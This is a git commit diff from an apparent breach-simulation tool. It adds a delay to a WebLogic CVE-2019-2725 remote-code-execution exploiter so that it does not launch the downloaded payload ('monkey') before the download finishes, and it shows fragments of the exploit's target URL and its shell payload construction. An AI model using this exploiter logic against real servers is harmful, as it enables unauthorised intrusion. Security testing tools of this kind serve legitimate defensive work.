Added delay in weblogic to make exploiter more reliable

2019-09-25 15:42:24 +03:00 · 2019-09-25 15:42:24 +03:00 · 06182a485a
parent 8c69cc0af9
commit 06182a485a
1 changed files with 6 additions and 0 deletions
--- a/monkey/infection_monkey/exploit/weblogic.py
+++ b/monkey/infection_monkey/exploit/weblogic.py
@ -252,6 +252,7 @@ class WebLogic201710271(WebRCE):
 # https://github.com/rapid7/metasploit-framework/pull/11780
 class WebLogic20192725(WebRCE):
    URLS = ["_async/AsyncResponseServiceHttps"]
+    DELAY_BEFORE_EXPLOITING_SECONDS = 5

    _TARGET_OS_TYPE = WebLogicExploiter._TARGET_OS_TYPE
    _EXPLOITED_SERVICE = WebLogicExploiter._EXPLOITED_SERVICE
@ -266,6 +267,11 @@ class WebLogic20192725(WebRCE):
        exploit_config['dropper'] = True
        return exploit_config

+    def execute_remote_monkey(self, url, path, dropper=False):
+        # Without delay exploiter tries to launch monkey file that is still finishing up after downloading.
+        time.sleep(WebLogic20192725.DELAY_BEFORE_EXPLOITING_SECONDS)
+        super(WebLogic20192725, self).execute_remote_monkey(url, path, dropper)
+
    def exploit(self, url, command):
        if 'linux' in self.host.os['type']:
            payload = self.get_exploit_payload('/bin/sh', '-c', command)